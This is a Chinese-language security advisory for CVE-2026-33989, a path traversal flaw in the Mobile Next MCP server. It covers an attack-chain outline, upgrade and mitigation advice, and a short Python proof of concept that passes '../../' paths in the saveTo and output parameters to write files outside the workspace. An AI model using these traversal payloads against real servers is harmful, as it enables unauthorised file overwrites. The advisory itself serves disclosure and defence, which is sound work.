CVE-2026-33989 CVSS 8.1 高危

CVE-2026-33989 Mobile Next路径遍历漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33989

漏洞类型

路径遍历

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Mobile Next (@mobilenext/mobile-mcp)

漏洞概述

Mobile Next的MCP服务器在0.0.49之前的版本中存在严重的路径遍历漏洞。攻击者可利用`mobile_save_screenshot`和`mobile_start_screen_recording`工具中未经验证的`saveTo`和`output`参数，将文件写入预期工作区之外的任意位置。该漏洞无需认证即可被利用，但需要用户交互，可能导致系统完整性及可用性受损。建议尽快升级至0.0.49版本。

技术细节

该漏洞源于Mobile Next MCP服务器对用户输入参数的过滤不足。具体而言，在处理`mobile_save_screenshot`（截图保存）和`mobile_start_screen_recording`（屏幕录制）这两个工具的请求时，服务器直接将用户提供的`saveTo`和`output`参数传递给了底层的文件系统操作函数，而未对其进行路径规范化或合法性校验。攻击者可以通过构造包含“../”序列的恶意路径，成功绕过工作区目录的限制，实现目录遍历攻击。由于攻击向量为网络（AV:N）且无需认证（PR:N），远程攻击者可诱导用户进行交互（UI:R），随后在服务器文件系统的任意位置写入恶意文件。虽然该漏洞不影响机密性（C:N），但可能导致关键文件被覆盖或篡改，从而对系统的完整性（I:H）和可用性（A:H）造成严重影响。

攻击链分析

STEP 1

侦察

识别正在运行Mobile Next MCP服务器且版本低于0.0.49的目标系统。

STEP 2

构造载荷

攻击者准备特制的JSON请求，在`saveTo`或`output`参数中插入路径遍历字符（如../）。

STEP 3

触发漏洞

诱导用户交互或通过客户端向服务器发送包含恶意参数的请求，调用`mobile_save_screenshot`或`mobile_start_screen_recording`接口。

STEP 4

执行写入

服务器未经校验直接将参数传递给文件系统，导致文件被写入预期工作区之外的任意路径。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# PoC for CVE-2026-33989: Path Traversal in Mobile Next MCP Server
# Target: @mobilenext/mobile-mcp < 0.0.49
# This script demonstrates writing a file outside the intended workspace.

TARGET_URL = "http://localhost:3000/call_tool" # Example MCP endpoint

payload = {
    "tool": "mobile_save_screenshot",
    "arguments": {
        # Using path traversal sequences to write to a sensitive location
        "saveTo": "../../tmp/malicious_file.txt",
        "data": "bWUtYW5kcm9pZC1hdXRvbWF0aW9uLnBvYw==" # Base64 encoded dummy data
    }
}

# Alternative payload for screen recording
# payload = {
#     "tool": "mobile_start_screen_recording",
#     "arguments": {
#         "output": "../../etc/config_override.json"
#     }
# }

try:
    response = requests.post(TARGET_URL, json=payload)
    if response.status_code == 200:
        print("[+] PoC executed successfully. File likely written outside workspace.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

影响范围

@mobilenext/mobile-mcp < 0.0.49

防御指南

临时缓解措施

建议立即将@mobilenext/mobile-mcp组件升级至0.0.49或更高版本以修复此漏洞。若无法立即升级，应严格限制对MCP服务器的网络访问，仅允许受信任的客户端连接，并在系统层面监控异常的文件写入行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表